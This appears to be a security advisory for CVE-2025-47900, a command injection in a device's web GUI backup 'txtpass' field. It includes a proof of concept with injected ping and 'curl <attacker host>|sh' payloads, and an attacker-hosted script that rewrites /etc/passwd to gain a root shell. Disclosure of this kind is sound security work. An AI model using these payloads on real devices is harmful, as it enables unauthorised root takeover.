Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - CWE-78
Software Version: 2.4.16
NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-47900
CVSS: 8.8
Severity: High
Credits: Dario Emilio Bertani, Raffaele Bova, Andrea Sindoni, Simone Bossi, Antonio Carriero, Marco Manieri, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
The device doesn't correctly sanitize parameters used in the backup configuration functionality contained in the Web GUI. An attacker able to access the Web GUI can tamper with the “txtpass” field used to sign and download the backup file, and execute arbitrary shell commands.
Prerequisites: user with access to the web application by using valid credentials
Step-by-step instructions and PoC
A malicious user able to download the configuration file from the device Web GUI . When the backup form is properly filled and the "Download" button is clicked, an HTTP POST request is sent to /configbackuprestore. By manipulating the field “txtpass”, it was possible to inject the payload ";ping –c 10 <attacker_ip>;" (<attacker_ip> is the IPv4 address of the attacker), thereby altering the normal operation of the web server. Moreover, exploiting this vulnerability it is possible to obtain access to the device with user “root”.
Affected Endpoints
Below are the evidences with the vulnerability details and the payloads used.
Figure 1 - Payload used to exploit the vulnerability
This image shows that the content of the vulnerable parameter “txtpass” is modified with the bash command chosen:
1234;ping -c 10 <attacker_IP>;
Then the command is executed (please note dora is the hostname of the our attacker machine).
Figure 2 - Evidence
In order to obtain a shell on the target device, a file “index.html” with the following content is created (please note that in following example the user “exploit” has been already created by means of the available SSH access).
$ cat index.html
cp /etc/passwd /etc/passwd.exploit.bk
sed -i '$s|/usr/bin/kcli|/bin/sh|' /etc/passwd;
Then on the attacker machine a web server is set to listen on port 80:
root@dora:~# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Finally, the following command is injected:
1234;curl 163.162.217.40|sh;
The above command passed the result of the curl bash command to the sh, executing each line of our malicious file index.html.
The result was the replacing of the shell kcli with sh. As show in the image below, once we accessed ssh we obtained the sh shell.
Evidence
Security Impact
A malicious user with the access to the Web GUI of the device could insert a bash command to construct a reverse shell to the device and to control it.
